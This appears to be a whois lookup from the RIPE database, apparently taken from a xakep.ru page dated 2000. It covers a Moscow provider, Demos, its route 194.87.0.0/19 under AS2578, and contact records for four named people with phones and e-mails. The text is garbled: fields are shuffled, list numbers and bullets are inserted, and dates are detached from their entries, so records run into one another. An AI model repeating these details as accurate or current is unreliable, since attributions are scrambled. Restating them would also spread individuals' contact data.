descr:       Demos Plus Co. Ltd.
descr:       Moscow, Russia
country:     RU
admin-c:     PA75
tech-c:      ED12-RIPE
tech-c:      GB90-RIPE
tech-c:      GK41-RIPE
status:      ASSIGNED PA
mnt-by:      AS2578-MNT

1. changed:     eugen@demos.net
2. changed:     galka@demos.net
3. source:      RIPE

19970313
19990804

route:       194.87.0.0/19
descr:       DEMOS
origin:      AS2578

• notify:      noc@demos.net
• changed:     eugen@demos.net
• source:      RIPE

mnt-by:      AS2578-MNT
19970627

person:      Paul Antonov
address:     Demos Plus Ltd.
address:     Ovchinnikovskaya nab. 6/1
address:     Moscow 113035
address:     Russia
phone:       +7 095 9566233
phone:       +7 095 9566234
fax-no:      +7 095 9565042

1. e-mail:      apg@demos.net
2. changed:     apg@demos.net 19960618
3. person:      Evgeny R Didenko
   address:     Demos-Internet JSC
   address:     6-1 Ovchinnikovskaya nab.
   address:     Moscow 113035
   address:     Russia
   phone:       +7 095 737-0436
   phone:       +7 095 737-0400
   fax-no:      +7 095 233 5016
4. e-mail:      eugen@demos.net
5. notify:      eugen@demos.net

nic-hdl:     PA75
source:      RIPE

nic-hdl:     ED12-RIPE
changed:     eugen@demos.net
19960415

• changed:     eugen@demos.net
• source:      RIPE

19991230

person:      Gera V Bragin
address:     Demos Company Ltd.
address:     6-1 Ovchinnikovskaya nab.
address:     Moscow 113035
address:     Russia
phone:       +7 095 737 0436
phone:       +7 095 737 0400
fax-no:      +7 095 956 5042

e-mail:      gera@demos.net

nic-hdl:     GB90-RIPE

notify:      gera@demos.net

changed:     gera@demos.net
19970105

1. changed:     galka@demos.net
2. source:      RIPE
3. person:      Galina Kovalenko
   address:     Genesys Telecommunications Lab.
   address:     11, 2nd Obydenskiy pereulok
   address:     Moscow 119034
   address:     Russia
   phone:       +7 095 255 7940
   fax-no:      +7 095 255 7941
4. e-mail:      galka@genesyslab.ru
5. notify:      galka@genesyslab.ru

19991104

nic-hdl:     GK41-RIPE
remarks:     +7 095 255 7940 ext 2051
changed:     galka@genesyslab.ru
20000731
source:      RIPE

Connection closed by foreign host.

Источник: https://xakep.ru/2000/08/01/10365/